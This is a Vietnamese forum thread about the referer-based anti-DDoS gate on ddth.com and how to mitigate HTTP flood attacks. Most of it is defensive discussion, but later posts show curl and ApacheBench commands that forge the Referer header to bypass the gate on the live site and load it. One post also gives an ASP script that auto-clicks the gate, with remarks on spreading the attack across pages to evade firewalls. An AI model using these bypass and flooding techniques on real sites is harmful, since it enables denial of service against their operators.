PDA

View Full Version : Share Code chống DDos của ddth.com



headboynt
04-05-2006, 14:14
Em là member mới.
Đang cần một tool chống ddos. thấy điễn đàn có cái này chống khá hiệu quả.
Các admin hay ai có hảo tâm. share rùm được không?
lại còn thêm cái chống save trang web nữa chứ. Good lắm.

daem0n
05-05-2006, 00:43
Bạn muốn nói đến cái link "Click vào đây để xem nội dung" đó hả?

headboynt
05-05-2006, 12:16
đúng rồi, mình nghĩ bản đó là rất cool. cả chống được save pages nữa.
Admin hay ai có share cho anh em đi

lybinh
05-05-2006, 13:17
tui theo dỏi bài này

daem0n
07-05-2006, 01:26
DDTH sử dụng HTTP-Referer đính kèm trong request của HTTP Request để xem user mở 1 trang của DDTH lên từ 1 trang trong chính DDTH hay là từ 1 trang ở ngoài, sau đó sẽ hiện kết quả hoặc thông báo tương ứng. Lưu ý là HTTP Referer có thể bị spoof được. Ví dụ:
http://www.datatrendsoftware.com/spoof.html

expert
07-05-2006, 10:40
Ặc, hỏi code mà mọi người cứ nói đâu đâu. Đây là code đơn giản phục vụ cái "click vào đây". Code này chống được flash ddos.



<?php

//echo "<pre>";
//print_r($_SERVER);

if (!isset($_SERVER['HTTP_REFERER']))
{
// print error message
die( "
<html>
<head>
<title>Your Forum e.g. DDTH</title>
</head>
<body style='background-color:black;color:white'>
<center><br/><br/><br/><br/><br/>
M***7901;i b***7841;n nh***7845;n v***224;o ***273;***226;y ***273;***7875; b***7855;t ***273;***7847;u:<br/>
<a style='color:yellow' href='{$_SERVER['REQUEST_URI']}'>http://{$_SERVER['SERVER_NAME']}{$_SERVER['REQUEST_URI']}</a>
</center>
</body>
</html>
");
}


?>

VietDuc
07-05-2006, 12:00
nếu đơn giản như bạn nghĩ là gắn đoạn code trên vào là chống DDOS X-Flash như DDTH hiện nay thì DDTH chết queo từ lâu rồi. Vấn đề ko chỉ nằm ở code mà còn liên quan đến việc compile lại rất nhiều thứ phức tạp trên server. Và những cái đó ko đơn giản chỉ nói câu "share code đi DDTH" là xong đâu.

daem0n
07-05-2006, 17:17
Ặc, hỏi code mà mọi người cứ nói đâu đâu. Đây là code đơn giản phục vụ cái "click vào đây". Code này chống được flash ddos.

Vậy chứ không phải bạn đang implement những cái mà mình đề cập đến sao? ;)



if (!isset($_SERVER['HTTP_REFERER']))

Đây là cái gì vậy hả bạn?

expert
07-05-2006, 23:35
Tôi không nói bạn sai, mà tôi nói mọi người không cho share code. Tôi làm điều đó.
VietDuc, code ở đây hiểu là code cho cái "click vào đây...", một đích nhắm của các bạn muốn chống trong tầng application. Trong tầng này thì Apache và PHP phải làm việc, nhưng Database server không phải làm việc, như vậy cũng là rất tốt. Và code này chỉ chống Flash dos chứ không chống các yêu cầu phức tạp từ binary executable.
Để chống dos hoàn chỉnh, chỉ compile server thôi là đủ hay sao? Không có gì là đủ để chống, bao gồm cả phần cứng, phần mềm, firewall server thứ 2, một đường backbone trong một data center tốt hoặc thậm chí cần nhiều server để cân bằng tải hoặc làm reverse proxy. Bạn có nói là bạn compile rất phức tạp, thì cũng không phù hợp với chủ đề này. Mà tôi hy vọng là bạn có biết code của DDTH để hiện lên dòng "click vào đây", vì bạn là nơi lưu trữ của ddth, hay là bạn không biết luôn? :)

VietDuc
08-05-2006, 00:03
Chính vì tôi biết nên tôi mới nói đoạn code của bạn ko phải là cái mà DDTH đang xài, có vậy thôi.

Để chống dos hoàn chỉnh, chỉ compile server thôi là đủ hay sao? Không có gì là đủ để chống, bao gồm cả phần cứng, phần mềm, firewall server thứ 2, một đường backbone trong một data center tốt hoặc thậm chí cần nhiều server để cân bằng tải hoặc làm reverse proxy.Điểm này bạn rất đúng.

san9nh0
09-05-2006, 23:21
Tui viết ít nhưng xem nhìu vì tui ít kiến thức để viết.
Xem nhìu nên thấy: ông VietDuc này hay gây sự quá, mấy newbie nói chuyện ổng hổng giúp gì nhìu mà thấy gây người ta không à...
Sorry nha, tại thấy sao nói vậy. Hong có ác ý.

VietDuc
10-05-2006, 02:48
Xem nhìu nên thấy: ông VietDuc này hay gây sự quá, mấy newbie nói chuyện ổng hổng giúp gì nhìu mà thấy gây người ta không à...
Sorry nha, tại thấy sao nói vậy. Hong có ác ý.Bạn search thử các post tôi đã viết xem tôi giúp hay phá người. Có lẽ vài bài post của tôi gần đây mang cho bạn suy nghĩ đó. Cũng ko sao, nhân vô thập toàn, tôi cũng là người thôi mà.

Thân!

dropdb
24-05-2006, 18:41
Tui viết ít nhưng xem nhìu vì tui ít kiến thức để viết.
Xem nhìu nên thấy: ông VietDuc này hay gây sự quá, mấy newbie nói chuyện ổng hổng giúp gì nhìu mà thấy gây người ta không à...
Sorry nha, tại thấy sao nói vậy. Hong có ác ý.
híhí, bạn VietDuc này chưa có vợ nên còn sung

bluesky
24-05-2006, 23:43
híhí, bạn VietDuc này chưa có vợ nên còn sung
không những có dzợ mà còn có con nữa cơ....chưa có dzợ thì khối cô chết à nhà

VietDuc
25-05-2006, 00:32
Suyttttttttttttttttt ku Bờ lu sờ kai nhìu chiện

bluesky
25-05-2006, 02:14
nếu đơn giản như bạn nghĩ là gắn đoạn code trên vào là chống DDOS X-Flash như DDTH hiện nay thì DDTH chết queo từ lâu rồi. Vấn đề ko chỉ nằm ở code mà còn liên quan đến việc compile lại rất nhiều thứ phức tạp trên server. Và những cái đó ko đơn giản chỉ nói câu "share code đi DDTH" là xong đâu.

theo như nội dung trên của anh VĐ thì mình ko thấy chỗ nào gọi là gây với người khác cả.Anh VĐ chỉ bảo là mọi việc không đơn giản như các bạn nghĩ vả việc phòng thủ khỏi DDos là 1 việc phức tạp.
Hiện nay DDos là 1 vấn đề chưa có cách khắc phục hoàn thiện,chỉ có thể giảm khả năng bị DDos xuống mức thấp nhất có thể thôi và cần 1 dàn server khá mạnh cho việc này.Vì vậy ngoài vốn kiến thức cũng cần có khá nhìu money cho việc này.

nothing_dcn
25-05-2006, 02:26
expert anh ơi cho em hỏi .Cách sử dụng đoạn code đó như thế nào .Em định cho vào fourm vbb 3.5.4 nhưng không biết cho kiểu gì, rất mong anh giúp

lyhuuloi
25-05-2006, 05:14
Bồ thử xem bài viết này nhé:

Giải pháp hạn chế DDoS (http://sanchoituoitre.info/topic/2067/)

vikhoa
25-05-2006, 10:38
Tôi có thể chia sẻ 1 số thông tin về cách chống DDoS tại DDTH.

Đầu tiên bạn phải phân tích cách tấn công, và nó ảnh hưởng đến những gì trên hệ thống của bạn.

Với những bạn không biết, thì X-flash sẽ tấn công như là 1 HTTP request thông thường, nhưng với cường độ cao và số lượng lớn. Có cách nào để phân biệt HTTP request của X-flash với HTTP request của người dùng thường không? Về lý thuyết là không, nó hoàn toàn giống nhau.

Trước đây với X-flash cũ thì còn có thể check được qua User-Agent referrer nhưng với X-flash mới thì điều đó không làm được.

Như vậy, khi có 1 lượng request cực lớn đến website của bạn thì Apache, PHP, MySQL sẽ phải hoạt động toàn bộ, như vậy sẽ chiếm rất nhiều tài nguyên hệ thống và với hệ thống yếu thì sẽ bị sập ngay.

Với các hệ thống mạnh hơn thì cũng cầm cự được nhưng khi đó bạn truy cập vào site sẽ rất chậm, 1 phần cũng do đường truyền bị tắc nghẽn, server load sẽ lên 99-100%. Thường thì MySQL sẽ "die" đầu tiên vì số connections bị full.

Như vậy, biện pháp đề ra để hạn chế DDoS là làm sao để giảm "công việc" cho Apache-PHP-MySQL, đặc biệt là MySQL. Các bạn có thể để ý, các site flash thường nhắm vào những file script chạy nhiều query nhất để gây ảnh hưởng lớn đến MySQL.

Từ các vấn đề ở trên, và qua 1 thời gian thử nghiệm các biện pháp, chúng tôi đưa ra các hướng giải quyết như sau:

- 1 HTTP request đến 1 file bất kỳ trong server sẽ được "kiểm tra" trước xem đó là người dùng thật hay là x-flash tự động.

Như vậy sẽ phải có 1 bước kiểm tra và "phát thẻ", chỉ những ai có thẻ mới tiếp tục đi vào hết các khu vực khác của website.

Đó là lý do tại sao bạn phải "click vào đây" để đi tiếp vào DDTH. Xflash thì không thể "click" được :D

Đó là bước 1.

- Tiếp theo, phải làm sao để những HTTP request đó không ảnh hưởng đến MySQL, như vậy ta sẽ phải chặn ngay từ khi script PHP bắt đầu hoạt động. Tuy nhiên, vậy thì PHP cũng phải xử lý và cũng vẫn tốn tài nguyên như thường.

Sau 1 thời gian nghiên cứu, chúng tôi đưa ra được giải pháp chặn ngay từ Apache, tức là PHP cũng không phải chạy để xử lý request đầu tiên mà chỉ xử lý những request nào đã được kiểm tra.

- Tiếp theo nữa là build lại Apache 1 cách tối ưu nhất theo các hướng đã đề ra.

Như vậy, khi bị xflash tấn công, server chỉ xử lý rất ít và sử dụng ít tài nguyên hơn trước rất nhiều. Điều đó đồng nghĩa với việc xflash phải tấn công với cường độ lớn hơn trước rất rất nhiều thì mới có thể đánh sập server được.

Nhận xét thêm về 1 số script các bạn viết dạng PHP -> PHP vẫn sẽ phải xử lý request của xflash và việc đó cũng sẽ làm server load tăng cao. Như vậy cách dùng script PHP để check Referrer và thậm chí là cả ghi/check cookies cũng chỉ hạn chế được 1 phần nhỏ chứ không đạt hiệu quả cao lắm.

Tuy nhiên cách này có thể áp dụng cho các trang web đang host tại shared host/reseller và không thể can thiệp trực tiếp vào hệ thống.

Đó cũng là lý do tại sao bạn nên thuê ít nhất là VPS cho đến các dedicated server để toàn quyền kiểm soát hệ thống và có thể làm được nhiều việc hơn.

Giá VPS ngày nay cũng không còn đắt, tôi nghĩ đó là 1 bước khởi đầu tốt cho 1 website dạng trung bình. Còn share host/reseller chỉ nên dùng cho các trang mới mở, chủ yếu chạy HTML. Nếu dùng PHP/MySQL mà website của bạn cũng khá quan trọng, nên thuê từ VPS trở lên. Còn nếu "web die à...kệ nó", thì bạn không cần phải đọc nguyên bài viết dài này làm gì nữa, vào www.potay.com giải trí thôi nào :D

P/S: 1/ Code chính xác của DDTH để chống DDoS thì thuộc về 0day nên tôi không có quyền share.
2/ Có 1 số điều tôi nói theo cách dễ hiểu nhất cho mọi người, vui lòng không bắt bẻ từng câu chữ nếu nói rõ về kỹ thuật. Nếu thích nói chi tiết về kỹ thuật, chúng ta nên lập thread khác để thảo luận và trao đổi.

lyhuuloi
25-05-2006, 10:44
Bó tay .com với anh vikhoa :D

VIETCOM
25-05-2006, 13:44
Tóm lại là phải có VPS hoặc dedicated server để tự mình config thì mới đỡ được , chứ Host và Reseller thì ngậm gùi mà chờ chết .
Firewall code bằng Script PHP cũng sẽ làm server load tăng cao , chỉ hạn chế được 1 phần nhỏ chứ không đạt hiệu quả cao .

U.F.O
29-05-2006, 12:01
Còn nếu "web die à...kệ nó", thì bạn không cần phải đọc nguyên bài viết dài này làm gì nữa, vào www.potay.com giải trí thôi nào
--> Ặc trang này vào được nà . Cứ tưởng anh ý nói đùa ^_^
( làm thay dổi không khí tí . EM 0 có ý câu đâu.Khị khị)

SieuHost.Com
29-05-2006, 15:36
- 1 HTTP request đến 1 file bất kỳ trong server sẽ được "kiểm tra" trước xem đó là người dùng thật hay là x-flash tự động.

Như vậy sẽ phải có 1 bước kiểm tra và "phát thẻ", chỉ những ai có thẻ mới tiếp tục đi vào hết các khu vực khác của website.

Đó là lý do tại sao bạn phải "click vào đây" để đi tiếp vào DDTH. Xflash thì không thể "click" được :D

Đó là bước 1.

Bước 1 dùng htaccess chặn lại là xong



- Tiếp theo, phải làm sao để những HTTP request đó không ảnh hưởng đến MySQL, như vậy ta sẽ phải chặn ngay từ khi script PHP bắt đầu hoạt động. Tuy nhiên, vậy thì PHP cũng phải xử lý và cũng vẫn tốn tài nguyên như thường.

Sau 1 thời gian nghiên cứu, chúng tôi đưa ra được giải pháp chặn ngay từ Apache, tức là PHP cũng không phải chạy để xử lý request đầu tiên mà chỉ xử lý những request nào đã được kiểm tra.

- Tiếp theo nữa là build lại Apache 1 cách tối ưu nhất theo các hướng đã đề ra.


Bước 2: tuy giải thích nghe phức tạp nhưng thực hiện cực kì đơn giản. Nếu thực hiện phức tạp quá hóa ra apache phải làm việc nặng hơn cả PHP request sao :D

Cách này nói chung chỉ hạn chế ở mức DDOS từ website chứ nếu sử dùng botnet với khoảng 10000 connection thì apache cũng ngủm từ lâu.

hansho
29-05-2006, 15:59
Nói tóm lại là chẳng có biện pháp nào hoàn chỉnh trong thời gian này để chống ddos ? Source thì không thể share ? => Buồn !

vikhoa
29-05-2006, 16:18
Bước 1 dùng htaccess chặn lại là xong -> Đơn giản thế thôi sao? :)

1/ Gây phiền phức hơn nhiều cho người dùng, với 1 số người không biết thì họ sẽ bỏ qua luôn mà không gõ user/pass vào (mặc dù đã ghi sẵn trên form).

2/ Bypassed htaccess với user/password có sẵn là 1 chuyện cực kỳ dễ dàng. Chẳng lẽ SieuHost.com không biết điều đó?

3/ Cộng 2 điều trên lại thì htaccess trở nên vô dụng.

Bước 2: tuy giải thích nghe phức tạp nhưng thực hiện cực kì đơn giản. Nếu thực hiện phức tạp quá hóa ra apache phải làm việc nặng hơn cả PHP request sao

Vâng, thực hiện cũng khá đơn giản. Tuy nhiên 1 chương trình nhỏ xíu thực hiện việc này sẽ hiệu quả hơn nhiều so với Apache hoặc PHP vốn hơi bị "cồng kềnh". Vấn đề nằm ở chỗ làm sao để chương trình đó hoạt động hiệu quả. Điều này thì ...chắc là không đến nỗi đơn giản lắm.

Tất nhiên, tất cả các biện pháp trên đây cũng chỉ là để hạn chế. Hạn chế nhiều hay ít thì tùy vào phương pháp. Nếu hạn chế được nhiều thì tỉ lệ sống sót của server sẽ cao hơn. :) "Đơn giản" thế thôi.

Về vấn đề code, vui lòng đọc bài dưới đây của 0day:
http://www.ddth.com/showpost.php?p=552862&postcount=25

real_time
29-05-2006, 22:24
Tôi có thể chia sẻ 1 số thông tin về cách chống DDoS tại DDTH.

Từ các vấn đề ở trên, và qua 1 thời gian thử nghiệm các biện pháp, chúng tôi đưa ra các hướng giải quyết như sau:

- 1 HTTP request đến 1 file bất kỳ trong server sẽ được "kiểm tra" trước xem đó là người dùng thật hay là x-flash tự động.

Như vậy sẽ phải có 1 bước kiểm tra và "phát thẻ", chỉ những ai có thẻ mới tiếp tục đi vào hết các khu vực khác của website.

Đó là lý do tại sao bạn phải "click vào đây" để đi tiếp vào DDTH. Xflash thì không thể "click" được :D



Tôi tin rằng với khả năng của mình tôi không làm được X-Flash có thể click được (do chưa nghiên cứu X-Flash bao giờ)nhưng có khả năng làm được 1 asp, vbs script có khả năng click vô dòng [click vô đây để đến nơi cần đến] của DDTH được. Chuyện này không khó nhưng tôi nghiên cứu source của file [click vô đây ...] thì hình như nó có khả năng chặn được cả những cú click tự động thông qua các script?

blackterran
30-05-2006, 00:03
Cái quan trọng là chặn bớt được càng nhiều càng tốt. Và cách DDTH làm là dựa trên nguyên lý referer của X-Flash request thì không bắt đầu bằng www.ddth.com.

cemalon
30-05-2006, 06:35
Cái quan trọng là chặn bớt được càng nhiều càng tốt. Và cách DDTH làm là dựa trên nguyên lý referer của X-Flash request thì không bắt đầu bằng www.ddth.com.

Chống x-flash mà chỉ dựa vào referer thì... hỏng.

vikhoa
30-05-2006, 08:35
Tôi tin rằng với khả năng của mình tôi không làm được X-Flash có thể click được (do chưa nghiên cứu X-Flash bao giờ)nhưng có khả năng làm được 1 asp, vbs script có khả năng click vô dòng [click vô đây để đến nơi cần đến] của DDTH được. Chuyện này không khó nhưng tôi nghiên cứu source của file [click vô đây ...] thì hình như nó có khả năng chặn được cả những cú click tự động thông qua các script?

real_time thử làm đi, nếu làm được thì chúng ta cùng nghiên cứu lại lỗi của script để tìm cách khắc phục.

Rất hoan nghênh các bạn nào tìm cách "vượt rào" của DDTH để chúng ta có thể ngày càng đưa ra các giải pháp tốt nhất để hạn chế DDoS :)

bvhn
30-05-2006, 10:44
real_time thử làm đi, nếu làm được thì chúng ta cùng nghiên cứu lại lỗi của script để tìm cách khắc phục.

Rất hoan nghênh các bạn nào tìm cách "vượt rào" của DDTH để chúng ta có thể ngày càng đưa ra các giải pháp tốt nhất để hạn chế DDoS :)
Đúng như 0day nói thì phương pháp chống DOS của ddth thực sự chưa hiệu quả: chỉ đơn giản thêm trường "Referer: http://www.ddth.com" vào Request URL là vượt qua dễ dàng.
Thử dùng vài lệnh cơ bản:


C:\>curl -A "Mozilla/5.0" -i http://www.ddth.com/
HTTP/1.1 418 0day F--king RFC
Date: Mon, 29 May 2006 18:39:15 GMT
Server: Apache/2.0.52 (Unix)
Content-Length: 188
Content-Type: text/html; charset=iso-8859-1
Connection: Keep-Alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><body><p><center><a href="http://www.ddth.com/">[Click vao day]</a><br>de
chuyen den noi dung can xem.</center></p>
</body></html>


Thêm Referer vào request:


curl -e "http://www.ddth.com/" -i http://www.ddth.com/
HTTP/1.1 200 OK
Date: Mon, 29 May 2006 18:36:43 GMT
Server: Apache/2.0.52 (Unix)
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: bbsessionhash=f471f1f2d5390b46c42885806dde46d8; path=/; domain=.ddth
.com
Set-Cookie: bblastvisit=1148927803; expires=Tue, 29 May 2007 18:36:43 GMT; path=
/; domain=.ddth.com
Set-Cookie: bblastactivity=0; expires=Tue, 29 May 2007 18:36:43 GMT; path=/; dom
ain=.ddth.com
Connection: Close

<...nội dung trang index ...>

-> Vượt qua khả năng chống DOS của ddth dễ dàng.
Giờ ta thử với công cụ ab (ApacheBench) có sẵn trong apache:
Trước khi thêm referer:


ab -n 20 -c 5 -k http://www.ddth.com/
This is ApacheBench, Version 2.0.41-dev <$Revision: 1.141 $> apache-2.0
Copyright (c) 1996 Adam Twiss, Zeus Technology Ltd, http://www.zeustech.net/
Copyright (c) 1998-2002 The Apache Software Foundation, http://www.apache.org/

Benchmarking www.ddth.com (be patient).....done


Server Software: Apache/2.0.52
Server Hostname: www.ddth.com
Server Port: 80

Document Path: /
Document Length: 188 bytes

Concurrency Level: 5
Time taken for tests: 1.588177 seconds
Complete requests: 20
Failed requests: 0
Write errors: 0
Non-2xx responses: 20
Keep-Alive requests: 20
Total transferred: 8200 bytes
HTML transferred: 3760 bytes
Requests per second: 12.59 [#/sec] (mean)
Time per request: 397.044 [ms] (mean)
Time per request: 79.409 [ms] (mean, across all concurrent requests)
Transfer rate: 5.04 [Kbytes/sec] received

Connection Times (ms)
min mean[+/-sd] median max
Connect: 0 78 139.4 0 314
Processing: 315 317 4.4 315 328
Waiting: 315 317 4.2 315 327
Total: 315 395 143.6 315 641

Percentage of the requests served within a certain time (ms)
50% 315
66% 315
75% 635
80% 637
90% 640
95% 641
98% 641
99% 641
100% 641 (longest request)


Chú ý thông số:
Requests per second: 12.59 [#/sec] (mean)

Sau khi thêm referer:


ab -H "Referer: http://www.ddth.com/" -H "User-Agent: Mozilla/5" -n 200 -c 5 -k http://www.ddth.com/
This is ApacheBench, Version 2.0.41-dev <$Revision: 1.141 $> apache-2.0
Copyright (c) 1996 Adam Twiss, Zeus Technology Ltd, http://www.zeustech.net/
Copyright (c) 1998-2002 The Apache Software Foundation, http://www.apache.org/

Benchmarking www.ddth.com (be patient).....done


Server Software: Apache/2.0.52
Server Hostname: www.ddth.com
Server Port: 80

Document Path: /
Document Length: 143345 bytes

Concurrency Level: 5
Time taken for tests: 24.631920 seconds
Complete requests: 20
Failed requests: 0
Write errors: 0
Keep-Alive requests: 0
Total transferred: 3000518 bytes
HTML transferred: 2990995 bytes
Requests per second: 0.81 [#/sec] (mean)
Time per request: 6157.980 [ms] (mean)
Time per request: 1231.596 [ms] (mean, across all concurrent requests)
Transfer rate: 118.95 [Kbytes/sec] received

Connection Times (ms)
min mean[+/-sd] median max
Connect: 313 313 0.7 314 314
Processing: 3096 5512 943.7 5694 7015
Waiting: 1206 3541 846.4 3802 4812
Total: 3409 5826 944.0 6008 7329
WARNING: The median and mean for the initial connection time are not within a normal deviation
These results are probably not that reliable.

Percentage of the requests served within a certain time (ms)
50% 6008
66% 6079
75% 6441
80% 6979
90% 7303
95% 7329
98% 7329
99% 7329
100% 7329 (longest request)


Thông số: "Requests per second: 0.81 [#/sec] (mean)"
đã giảm một cách đáng kể (do thực thi mã php). Và nếu tăng số Request (-n) và số người dùng đồng thời (-c) thì server của ddth có nguy cơ quá tải.
Có lẽ vikhoa nên có phương pháp nâng cấp giải pháp chống DOS mới nhỉ!

SieuHost.Com
30-05-2006, 15:20
2/ Bypassed htaccess với user/password có sẵn là 1 chuyện cực kỳ dễ dàng. Chẳng lẽ SieuHost.com không biết điều đó?

Dùng htaccess để tạo link "click vào đây" thần kì chứ tôi có bảo là phải nhập username/password đâu nào :D



Đúng như 0day nói thì phương pháp chống DOS của ddth thực sự chưa hiệu quả: chỉ đơn giản thêm trường "Referer: http://www.ddth.com" vào Request URL là vượt qua dễ dàng.
Thử dùng vài lệnh cơ bản:
Copy & paste thử một phát thì thấy lệnh cơ bản nhưng hiệu quả thật.
Bác bhvn cho vài lệnh nâng cao chắc là mệt đây !!!

real_time
30-05-2006, 16:38
Đây là đoạn code của mình viết bằng ASP nhưng nó không hiểu quả một chút nào vì tuy click được vào chỗ [click vô đây] nhưng lại không tạo được session để đi sâu vào trong. Hy vọng mọi người chỉ giáo thêm.


<html>
<body>
<%
Set http = createobject("microsoft.xmlhttp")
http.open "GET","http://ddth.com",False
http.send
str = Server.HTMLEncode(http.ResponseText)
posstart = instr(str,"href=")
str1=mid(str,posstart+11,len(str))
posend = instr(str1,"&gt;")
linkapear = left(str1,posend-8)
set http=nothing
%>
<script language="javascript">
setTimeout('',20000)
</script>
<%
Set http1 = createobject("microsoft.xmlhttp")
http1.open "GET",linkapear,False
http1.send
response.write http1.ResponseText
set http1 = nothing
%>
</body>
</html>

ở đây mình mới viết cho trang chủ của DDTH.com mà thôi còn có thể cải tiến đề viết cho bất cứ link nào thuộc ddth nữa và vì vậy khả năng tấn công sẽ đa dạng chứ không chỉ riêng nhằm vào trang chủ mà có thể nhằm vào bất cứ trang nào để có độ load cao hơn và tránh firewall nhận ra là DDOS chỉ tập trung vào 1 trang duy nhất.

holefree
30-05-2006, 18:03
vấn đề ở đây là asp thì chính server chứa đoạn script này cũng chịu xử lý, collect 1000 connections để hướng đến ddth thì server chứa đoạn script này cũng phải xử lí tương tự ( dù là nhẹ hơn ddth )
cách của bhvn thì cũng chỉ có tác dụng tham khảo, thăm dò thôi (trừ khi có mạng botnet trong tay), dùng php để fake referer cũng ra kết quả giống vậy, hoặc test bằng minibrower cũng thế.
khác biệt ở đây là flash được xử lý bởi brower client :) ( muh trong flash cũng làm được như thế . . amen )

sieuhost: cách đó cũng chống đỡ tình thế cho lúc bị Ddos tương đối nhẹ, nhưng có lẽ sieuhost ko hiểu ( hoặc là bỏ qua ) cái status 418 trả về từ ddth

nguoitamky
30-05-2006, 18:19
collect 1000 connections để hướng đến ddth thì server chứa đoạn script này cũng phải xử lí tương tự ( dù là nhẹ hơn ddth ) nghĩa là người tấn công cũng chịu tổn thất tương đương sao ? bây giờ tôi thấy mọi người hay dùng botnet để gởi spam mail là chủ yếu, ít thấy dùng nó vào việc vô bổ này đâu :D trừ khi có ai đó thực sự muốn làm hại site của bạn, mà bây giờ site bị die do Dos xẩy ra như cơm bữa, khó mà nói trước site thọ được bao lâu khi publish lên mạng.

real_time
30-05-2006, 19:06
nghĩa là người tấn công cũng chịu tổn thất tương đương sao ? bây giờ tôi thấy mọi người hay dùng botnet để gởi spam mail là chủ yếu, ít thấy dùng nó vào việc vô bổ này đâu :D trừ khi có ai đó thực sự muốn làm hại site của bạn, mà bây giờ site bị die do Dos xẩy ra như cơm bữa, khó mà nói trước site thọ được bao lâu khi publish lên mạng.
rất đúng và nhiều khi còn bị ddth trả về một lượng dữ liệu lớn hơn để xử lý và vị vậy nếu ko có botnet thì không ai dùng cách này cả.

javagaga
31-05-2006, 13:02
Viết botnet (không biết có phải như là webbrowser automation không?) không khó, nhưng ko phát tán để tấn công vào 1 mục tiêu được, flash thì có thể nhiều người vô tình tải về và tự động chạy, nhưng botnet gần như phải được phép chạy trên máy client (có thể bị phát hiện bằng tưởng lửa, bị cản vì là file exe tải từ mạng về...)

real_time
31-05-2006, 14:26
Viết botnet (không biết có phải như là webbrowser automation không?) không khó, nhưng ko phát tán để tấn công vào 1 mục tiêu được, flash thì có thể nhiều người vô tình tải về và tự động chạy, nhưng botnet gần như phải được phép chạy trên máy client (có thể bị phát hiện bằng tưởng lửa, bị cản vì là file exe tải từ mạng về...)
Bạn nhầm rồi khi người sử dụng vô tinh click vô một link độc hại Thì đã bị đưa vào một BOTNET rồi mà ko cần tải exe về. Có một loại JS nó ghi thông tin vào registry và như vậy đã được phát lệnh tấn công rồi. Có thể cường độ sẽ yếu hơn nhưng chưa chắc vì lệnh JS được phép chờ và tự lặp lại được mà. Các bạn còn nhớ cái loại virus thay đổi trang chủ của IE ko nhỉ nếu nó làm tinh vi hơn một chút (không thay đổi trang chủ IE mà chỉ ngấm ngầm phát động tấn công trang kia thì sao?)

headboynt
31-05-2006, 17:43
ở đây mình mới viết cho trang chủ của DDTH.com mà thôi còn có thể cải tiến đề viết cho bất cứ link nào thuộc ddth nữa và vì vậy khả năng tấn công sẽ đa dạng chứ không chỉ riêng nhằm vào trang chủ mà có thể nhằm vào bất cứ trang nào để có độ load cao hơn và tránh firewall nhận ra là DDOS chỉ tập trung vào 1 trang duy nhất.
hay hay, cảm ơn nha, mình thấy cool đó


--------------------------
Free Domain .Com.Net.Info.Org /1year
http://www.regdomainvn.com
liên hệ: YM: libivn1001

real_time
31-05-2006, 17:59
hay hay, cảm ơn nha, mình thấy cool đó
híc híc không biết là khen đểu hay khen thật nữa đây. Mong rằng nếu hay xin bạn đừng xử dụng đoạn code củ chuối của mình để chống phá người khác.

nguoitamky
31-05-2006, 18:00
Bạn nhầm rồi khi người sử dụng vô tinh click vô một link độc hại Thì đã bị đưa vào một BOTNET rồi mà ko cần tải exe về. Có một loại JS nó ghi thông tin vào registry và như vậy đã được phát lệnh tấn công rồi. Theo mình biết thì botnet nó giống như một thứ vius khi mà người dùng chỉ tải về một lần là máy tính của người đó hiển nhiên trở thành một công cụ điều khiển của những kẻ tạo ra botnet, bọn họ có thể dùng máy tính của victim để làm bất cứ việc gì họ muốn, vì vậy nếu muốn an toàn hơn khi lên mạng, mọi người nên dùng một anti-virus tool để phòng thân, còn nếu muốn tải những thứ bất hợp pháp thì nên ra dịch vụ :D nói chung máy người ta bị thì cũng chẳng liên quan đến mình

real_time
31-05-2006, 18:06
đúng mà nhưng mà exe thì mới có nhiều khả năng còn js và vbs thì yếu hơn nhiều.

ahn
31-05-2006, 22:25
Lạc đề với topic rùi các đại gia. Tôi không thích điều này ở các diển đàn Vn. Từ bài viết thứ 3 trở lên là pha loảng chủ đề thành dung dịch muối 1/1000 luôn :D

real_time
31-05-2006, 22:54
Lạc đề với topic rùi các đại gia. Tôi không thích điều này ở các diển đàn Vn. Từ bài viết thứ 3 trở lên là pha loảng chủ đề thành dung dịch muối 1/1000 luôn :D
Xin bạn nói chỉ giáo để chủ đề không loãng ra hơn nữa vì thực sự chúng tôi vẫn thấy mình còn kém và phải học hỏi nhiều nữa để tiến bộ và tìm cách chống DDOS một cách hiệu quả hơn. Mong bạn chỉ giáo chứ đừng đưa vào những lời bình loạn làm loãng thêm chủ đề thanks.

ahn
04-06-2006, 13:26
Xin bạn nói chỉ giáo để chủ đề không loãng ra hơn nữa vì thực sự chúng tôi vẫn thấy mình còn kém và phải học hỏi nhiều nữa để tiến bộ và tìm cách chống DDOS một cách hiệu quả hơn. Mong bạn chỉ giáo chứ đừng đưa vào những lời bình loạn làm loãng thêm chủ đề thanks.

Chào real_time, tôi cũng như bạn rất :không: thích DDos .Tôi thấy topic hay nên vào, mong học được j` đó cho mình. Tôi đọc các bài #11 ...#15 ở page 1 (do bận tui không để ý còn trang 2,3...thấy boring nên fast replay như vậy...ai dè nó đi ra cuối trang luôn :D :D nó đi phía dưới 1 số bài hữu ích :D )
Thành thật xin lỗi, mong mọi người tiếp tục :D

headboynt
04-06-2006, 15:07
Hiện em đã dùng hết các cách trên, không hiểu sao vẫn bị ddos + flood. không sao chống nổi. một lúc là site lại phải ngừng hoạt động.

server4vn
11-06-2006, 10:22
Hack các MOD evasive APF firewall thì có thể hạn chế được 80% sức tấn công của ddos với mấy người dùng server còn với Hosting thì bó tay :) vì kể cả chỉ để hiện cái http vớ vẩn trắng bóc ddos lâu thì CPU load cao server vẫn die thôi :) .

picasa
13-06-2006, 07:53
Nói tóm lại là chẳng có biện pháp nào hoàn chỉnh trong thời gian này để chống ddos ? Source thì không thể share ? => Buồn !

Hi hansho!
Bạn đừng buồn vì "anh ấy" trả lời trên diễn đàn này thôi. Thử PM cho anh ấy xem, hãy riêng ra ,đừng vào nơi công cộng. Dùng chiêu năn nỉ thế nào cũng được mà! hì hì!:w00t:

Nói về DDOS thì Pi không thảo luận được gì rồi.

Shellingfox
13-06-2006, 14:27
Vậy phần mềm curl download ở đâu vậy? EM có một bản nhưng không chạy được.

khhieu
15-06-2006, 09:06
Cac bác co thể share cho tấ cả mọi người được không. Tôi rất quan tâm tời chủ đề này

hansho
15-06-2006, 12:02
Hi hansho!
Bạn đừng buồn vì "anh ấy" trả lời trên diễn đàn này thôi. Thử PM cho anh ấy xem, hãy riêng ra ,đừng vào nơi công cộng. Dùng chiêu năn nỉ thế nào cũng được mà! hì hì!:w00t:

Nói về DDOS thì Pi không thảo luận được gì rồi.
Buồn vì không có cách chống tuyệt đối thôi, chứ cũng chẳng buồn vì chuyện không share, nếu như có share thì "anh ấy" đã public, không việc gì phải PM và dùng "mỹ nhân kế" :d
